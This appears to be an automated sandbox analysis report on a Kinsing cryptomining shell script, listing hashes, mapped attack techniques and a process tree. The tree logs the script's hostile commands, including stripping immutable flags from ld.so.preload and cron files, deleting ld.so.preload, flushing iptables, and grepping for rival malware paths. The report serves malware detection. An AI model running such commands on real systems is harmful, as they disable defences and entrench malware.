Analysis
-
max time kernel
88s -
max time network
89s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
24/02/2025, 02:43
Static task
static1
Behavioral task
behavioral1
Sample
3a4a73b5ba3c3b7b287890d97fe331f5381b4c52622f08fe132187f2484d905f.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
3a4a73b5ba3c3b7b287890d97fe331f5381b4c52622f08fe132187f2484d905f.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
3a4a73b5ba3c3b7b287890d97fe331f5381b4c52622f08fe132187f2484d905f.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
3a4a73b5ba3c3b7b287890d97fe331f5381b4c52622f08fe132187f2484d905f.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
3a4a73b5ba3c3b7b287890d97fe331f5381b4c52622f08fe132187f2484d905f.sh
-
Size
15KB
-
MD5
d4fa7dbafd91f905c97d3cad3be4cb5e
-
SHA1
b8caf58866ca2f12ed9797e7540b84faabaf1e49
-
SHA256
3a4a73b5ba3c3b7b287890d97fe331f5381b4c52622f08fe132187f2484d905f
-
SHA512
17423d63975daca16968c3731460554406a89bba94aa97e66633e8d091f350000580fc47d450b2b3107aaadcc1b6810b6b5007f9b96899179de566fac2881a2b
-
SSDEEP
384:r5JxgzLuqlH2wx2vUaQa5/eN86704s80ooJQYgykWT4yCtvUsDjdWOoJwd:trgXux7YJDj8OoJwd
Malware Config
Signatures
-
Kinsing Rootkit
Rootkit reuses the publicly available BEURK rootkit.
-
Kinsing Rootkit payload 1 IoCs
resource yara_rule behavioral4/files/fstream-17.dat family_elf_kinsing_rootkit -
Kinsing family
-
Kinsing payload 1 IoCs
resource yara_rule behavioral4/files/fstream-16.dat family_elf_kinsing_loader -
Kinsing_rootkit family
-
Modifies the dynamic linker configuration file 2 TTPs 1 IoCs
Malware can modify the configuration file of the dynamic linker to preload malicous libraries with every executed process.
description ioc Process File opened for modification /etc/ld.so.preload 3a4a73b5ba3c3b7b287890d97fe331f5381b4c52622f08fe132187f2484d905f.sh -
File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1709 chmod 1715 chmod 1716 chmod 1689 chmod 1691 chmod 1700 chmod 1702 chmod 1707 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /etc/data/kinsing 1717 3a4a73b5ba3c3b7b287890d97fe331f5381b4c52622f08fe132187f2484d905f.sh -
Flushes firewall rules 1 TTPs 1 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
pid Process 727 iptables -
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
pid Process 1437 sudo -
Attempts to change immutable files 50 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid Process 1600 xargs 1501 xargs 1528 xargs 1594 xargs 1624 xargs 1644 xargs 1683 xargs 714 chattr 718 chattr 1595 sed 1607 sed 1615 xargs 1475 xargs 1506 xargs 1523 xargs 1535 xargs 1592 sed 1604 sed 1606 xargs 1618 xargs 1470 xargs 1541 xargs 1603 xargs 1609 xargs 1621 xargs 1639 xargs 1511 xargs 721 chattr 1446 uname 1496 xargs 1591 xargs 1622 sed 1625 sed 1627 xargs 1553 xargs 1559 xargs 1601 sed 1667 xargs 1516 xargs 1485 xargs 1491 xargs 1547 xargs 1597 xargs 1613 sed 1616 sed 1678 xargs 1480 xargs 1598 sed 1619 sed 1656 xargs -
Creates/modifies Cron job 1 TTPs 64 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.CQ4BnC crontab File opened for modification /var/spool/cron/crontabs/tmp.Y7iiZD crontab File opened for modification /var/spool/cron/crontabs/tmp.v5oPE9 crontab File opened for modification /var/spool/cron/crontabs/tmp.Cc4v4y crontab File opened for modification /var/spool/cron/crontabs/tmp.DxyT9B crontab File opened for modification /var/spool/cron/crontabs/tmp.eWG6M1 crontab File opened for modification /var/spool/cron/crontabs/tmp.jqniDe crontab File opened for modification /var/spool/cron/crontabs/tmp.OUD55A crontab File opened for modification /var/spool/cron/crontabs/tmp.ySOPBv crontab File opened for modification /var/spool/cron/crontabs/tmp.uGPJgD crontab File opened for modification /var/spool/cron/crontabs/tmp.pY1r2G crontab File opened for modification /var/spool/cron/crontabs/tmp.UUlwwk crontab File opened for modification /var/spool/cron/crontabs/tmp.FlzfwX crontab File opened for modification /var/spool/cron/crontabs/tmp.Etulzy crontab File opened for modification /var/spool/cron/crontabs/tmp.BmeCiZ crontab File opened for modification /var/spool/cron/crontabs/tmp.bNTwIc crontab File opened for modification /var/spool/cron/crontabs/tmp.3ZLZna crontab File opened for modification /var/spool/cron/crontabs/tmp.BEupPX crontab File opened for modification /var/spool/cron/crontabs/tmp.N2yxeX crontab File opened for modification /var/spool/cron/crontabs/tmp.yqmaJV crontab File opened for modification /var/spool/cron/crontabs/tmp.G4t1oe crontab File opened for modification /var/spool/cron/crontabs/tmp.MznUuR crontab File opened for modification /var/spool/cron/crontabs/tmp.Ly0bp0 crontab File opened for modification /var/spool/cron/crontabs/tmp.SAUhLD crontab File opened for modification /var/spool/cron/crontabs/tmp.bIzlMg crontab File opened for modification /var/spool/cron/crontabs/tmp.dp7xm0 crontab File opened for modification /var/spool/cron/crontabs/tmp.XcUEBr crontab File opened for modification /var/spool/cron/crontabs/tmp.3VfROe crontab File opened for modification /var/spool/cron/crontabs/tmp.UvTC6B crontab File opened for modification /var/spool/cron/crontabs/tmp.NJhbXW crontab File opened for modification /var/spool/cron/crontabs/tmp.862686 crontab File opened for modification /var/spool/cron/crontabs/tmp.NVgHPc crontab File opened for modification /var/spool/cron/crontabs/tmp.IV4VPe crontab File opened for modification /var/spool/cron/crontabs/tmp.SrsGje crontab File opened for modification /var/spool/cron/crontabs/tmp.wAjjjg crontab File opened for modification /var/spool/cron/crontabs/tmp.m9MEcg crontab File opened for modification /var/spool/cron/crontabs/tmp.u3umLU crontab File opened for modification /var/spool/cron/crontabs/tmp.UTw1ws crontab File opened for modification /var/spool/cron/crontabs/tmp.zsGyqO crontab File opened for modification /var/spool/cron/crontabs/tmp.6TQAmB crontab File opened for modification /var/spool/cron/crontabs/tmp.8N1QQf crontab File opened for modification /var/spool/cron/crontabs/tmp.euJlaw crontab File opened for modification /var/spool/cron/crontabs/tmp.bLCdKe crontab File opened for modification /var/spool/cron/crontabs/tmp.7PRfmS crontab File opened for modification /var/spool/cron/crontabs/tmp.STpp4d crontab File opened for modification /var/spool/cron/crontabs/tmp.pKHSzb crontab File opened for modification /var/spool/cron/crontabs/tmp.LnoXNg crontab File opened for modification /var/spool/cron/crontabs/tmp.FJbDPa crontab File opened for modification /var/spool/cron/crontabs/tmp.JZM5JX crontab File opened for modification /var/spool/cron/crontabs/tmp.DfzXdJ crontab File opened for modification /var/spool/cron/crontabs/tmp.YCsVOA crontab File opened for modification /var/spool/cron/crontabs/tmp.mN35eh crontab File opened for modification /var/spool/cron/crontabs/tmp.TRSrkV crontab File opened for modification /var/spool/cron/crontabs/tmp.vgHsaf crontab File opened for modification /var/spool/cron/crontabs/tmp.qjQn2w crontab File opened for modification /var/spool/cron/crontabs/tmp.MzRJof crontab File opened for modification /var/spool/cron/crontabs/tmp.eihQZw crontab File opened for modification /var/spool/cron/crontabs/tmp.jLvsnZ crontab File opened for modification /var/spool/cron/crontabs/tmp.dWvWt0 crontab File opened for modification /var/spool/cron/crontabs/tmp.ZXL37Y crontab File opened for modification /var/spool/cron/crontabs/tmp.JqMmMb crontab File opened for modification /var/spool/cron/crontabs/tmp.wxWxDw crontab File opened for modification /var/spool/cron/crontabs/tmp.B73bjV crontab File opened for modification /var/spool/cron/crontabs/tmp.pkmR6T crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Modifies systemd 2 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
description ioc Process File opened for modification /lib/systemd/system/bot.service 3a4a73b5ba3c3b7b287890d97fe331f5381b4c52622f08fe132187f2484d905f.sh -
Reads CPU attributes 1 TTPs 64 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill -
Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl -
Process Discovery 1 TTPs 12 IoCs
Adversaries may try to discover information about running processes.
pid Process 1497 ps 1512 ps 1524 ps 1640 ps 1487 ps 1492 ps 1502 ps 1507 ps 1519 ps 1587 ps 1635 ps 1679 ps -
description ioc Process File opened for reading /proc/722/cmdline pkill File opened for reading /proc/327/stat ps File opened for reading /proc/157/cmdline pkill File opened for reading /proc/710/status pkill File opened for reading /proc/1/status pkill File opened for reading /proc/238/cmdline pkill File opened for reading /proc/350/cmdline ps File opened for reading /proc/73/cmdline ps File opened for reading /proc/1484/status ps File opened for reading /proc/71/status ps File opened for reading /proc/10/cmdline pkill File opened for reading /proc/75/cmdline pkill File opened for reading /proc/123/status ps File opened for reading /proc/sys/kernel/ngroups_max sudo File opened for reading /proc/20/status pkill File opened for reading /proc/81/cmdline pkill File opened for reading /proc/157/cmdline pkill File opened for reading /proc/19/status pkill File opened for reading /proc/706/status pkill File opened for reading /proc/2/cmdline ps File opened for reading /proc/18/cmdline ps File opened for reading /proc/71/cmdline pkill File opened for reading /proc/1580/status pkill File opened for reading /proc/174/cmdline pkill File opened for reading /proc/378/cmdline pkill File opened for reading /proc/674/cmdline pkill File opened for reading /proc/82/stat ps File opened for reading /proc/24/status ps File opened for reading /proc/3/cmdline pkill File opened for reading /proc/238/cmdline pkill File opened for reading /proc/10/status ps File opened for reading /proc/674/stat ps File opened for reading /proc/36/cmdline pkill File opened for reading /proc/9/cmdline pkill File opened for reading /proc/82/cmdline pkill File opened for reading /proc/sys/kernel/osrelease ps File opened for reading /proc/378/cmdline ps File opened for reading /proc/349/status ps File opened for reading /proc/676/cmdline ps File opened for reading /proc/37/cmdline pkill File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/71/status ps File opened for reading /proc/1478/stat ps File opened for reading /proc/1462/stat ps File opened for reading /proc/9/stat ps File opened for reading /proc/238/status pkill File opened for reading /proc/670/cmdline pkill File opened for reading /proc/71/status pkill File opened for reading /proc/22/status ps File opened for reading /proc/75/cmdline pkill File opened for reading /proc/353/cmdline pkill File opened for reading /proc/679/status pkill File opened for reading /proc/379/status pkill File opened for reading /proc/filesystems crontab File opened for reading /proc/78/status ps File opened for reading /proc/72/stat ps File opened for reading /proc/722/status ps File opened for reading /proc/122/cmdline pkill File opened for reading /proc/379/status pkill File opened for reading /proc/1675/stat ps File opened for reading /proc/71/cmdline ps File opened for reading /proc/20/status pkill File opened for reading /proc/705/cmdline pkill File opened for reading /proc/18/status pkill -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1389 ls 1822 sed
Processes
-
/tmp/3a4a73b5ba3c3b7b287890d97fe331f5381b4c52622f08fe132187f2484d905f.sh/tmp/3a4a73b5ba3c3b7b287890d97fe331f5381b4c52622f08fe132187f2484d905f.sh1⤵
- Modifies the dynamic linker configuration file
- Executes dropped EXE
- Modifies systemd
PID:710 -
/usr/bin/chattrchattr -i /etc/ld.so.preload2⤵
- Attempts to change immutable files
PID:714
-
-
/bin/rmrm -f /etc/ld.so.preload2⤵PID:716
-
-
/usr/bin/chattrchattr -R -ia /var/spool/cron2⤵
- Attempts to change immutable files
PID:718
-
-
/usr/bin/chattrchattr -ia /etc/crontab2⤵
- Attempts to change immutable files
PID:721
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
PID:727
-
-
/bin/grepgrep exe2⤵PID:737
-
-
/bin/lsls -latrh /proc/12⤵PID:736
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:740
-
-
/bin/grepgrep exe2⤵PID:744
-
-
/bin/lsls -latrh /proc/102⤵PID:743
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:747
-
-
/bin/grepgrep exe2⤵PID:750
-
-
/bin/lsls -latrh /proc/112⤵PID:749
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:754
-
-
/bin/grepgrep exe2⤵PID:758
-
-
/bin/lsls -latrh /proc/1102⤵PID:757
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:761
-
-
/bin/grepgrep exe2⤵PID:764
-
-
/bin/lsls -latrh /proc/122⤵PID:763
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:766
-
-
/bin/grepgrep exe2⤵PID:770
-
-
/bin/lsls -latrh /proc/1222⤵PID:768
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:772
-
-
/bin/grepgrep exe2⤵PID:775
-
-
/bin/lsls -latrh /proc/1232⤵PID:774
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:777
-
-
/bin/grepgrep exe2⤵PID:780
-
-
/bin/lsls -latrh /proc/132⤵PID:779
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:782
-
-
/bin/grepgrep exe2⤵PID:785
-
-
/bin/lsls -latrh /proc/142⤵PID:784
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:787
-
-
/bin/lsls -latrh /proc/1492⤵PID:789
-
-
/bin/grepgrep exe2⤵PID:790
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:792
-
-
/bin/grepgrep exe2⤵PID:795
-
-
/bin/lsls -latrh /proc/152⤵PID:794
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:797
-
-
/bin/grepgrep exe2⤵PID:800
-
-
/bin/lsls -latrh /proc/1572⤵PID:799
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:802
-
-
/bin/grepgrep exe2⤵PID:805
-
-
/bin/lsls -latrh /proc/162⤵PID:804
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:807
-
-
/bin/lsls -latrh /proc/172⤵PID:809
-
-
/bin/grepgrep exe2⤵PID:810
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:812
-
-
/bin/grepgrep exe2⤵PID:815
-
-
/bin/lsls -latrh /proc/1742⤵PID:814
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:817
-
-
/bin/grepgrep exe2⤵PID:820
-
-
/bin/lsls -latrh /proc/182⤵PID:819
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:822
-
-
/bin/grepgrep exe2⤵PID:825
-
-
/bin/lsls -latrh /proc/192⤵PID:824
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:827
-
-
/bin/grepgrep exe2⤵PID:830
-
-
/bin/lsls -latrh /proc/22⤵PID:829
-
-
